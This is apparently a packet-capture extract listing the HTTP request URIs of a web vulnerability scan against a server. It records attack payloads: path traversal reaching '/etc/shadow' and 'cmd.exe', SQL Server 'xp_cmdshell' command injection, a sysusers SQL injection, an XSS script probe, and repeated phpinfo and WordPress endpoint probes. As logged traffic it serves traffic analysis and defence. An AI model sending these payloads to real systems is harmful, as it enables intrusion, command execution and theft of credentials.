Packet [31]	Uri [/web?=PHPE9568F36-D428-11d2-A769-00AA001ACF42]
Packet [32]	Uri [/web?=PHPE9568F35-D428-11d2-A769-00AA001ACF42]
Packet [33]	Uri [/web?=PHPE9568F34-D428-11d2-A769-00AA001ACF42]
Packet [34]	Uri [/web?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000]
Packet [108]	Uri [/web?Z9AD0wB=..%2F..%2F..%2F..%2Fbin%2Fchgrp%20nobody%20%2Fetc%2Fshadow%7C]
Packet [110]	Uri [/web?Z9AD0wB=exec%20xp_cmdshell%20dir]
Packet [111]	Uri [/web?Z9AD0wB=%3Cscript%3Ealert%281%29%3C%2Fscript%3E]
Packet [113]	Uri [/web?Z9AD0wB=..%2F..%2FWINNT%2Fsystem32%2Fcmd.exe%3Fdir%2Bc%3A%5C]
Packet [114]	Uri [/web?Z9AD0wB=exec%20xp_cmdshell%20dir]
Packet [117]	Uri [/web?Z9AD0wB=exec%20master..xp_cmdshell%20dir]
Packet [118]	Uri [/web?Z9AD0wB=SELECT%20TOP%201%20name%20FROM%20sysusers]
Packet [120]	Uri [/web?Z9AD0wB=..%2F..%2FWINNT%2Fsystem32%2Fcmd.exe%3Fdir%2Bc%3A%5C]
Packet [337]	Uri [/PHPinfo.php]
Packet [347]	Uri [/PhpInfo.php]
Packet [355]	Uri [/PHPINFO.php]
Packet [370]	Uri [/phpinfo.php]
Packet [372]	Uri [/phpInfo.php]
Packet [2473]	Uri [/web/xmlrpc.php?rsd=]
Packet [2474]	Uri [/web/wp-includes/wlwmanifest.xml]
Packet [2477]	Uri [/web/wp-includes/wlwmanifest.xml]
Packet [2500]	Uri [/web/PHPinfo.php]
Packet [2502]	Uri [/web/phpInfo.php]
Packet [2507]	Uri [/web/phpInfo.php]
Packet [2508]	Uri [/web/PHPinfo.php]
Packet [2516]	Uri [/web/PhpInfo.php]
Packet [2517]	Uri [/web/PhpInfo.php]
Packet [2534]	Uri [/web/PHPINFO.php]
Packet [2586]	Uri [/web/PHPinfo.php]
Packet [2587]	Uri [/web/phpInfo.php]
Packet [2596]	Uri [/web/xmlrpc.php?rsd=]
Packet [2600]	Uri [/web/PhpInfo.php]
Packet [2620]	Uri [/web/PHPINFO.php]
Packet [2636]	Uri [/web/phpinfo.php]
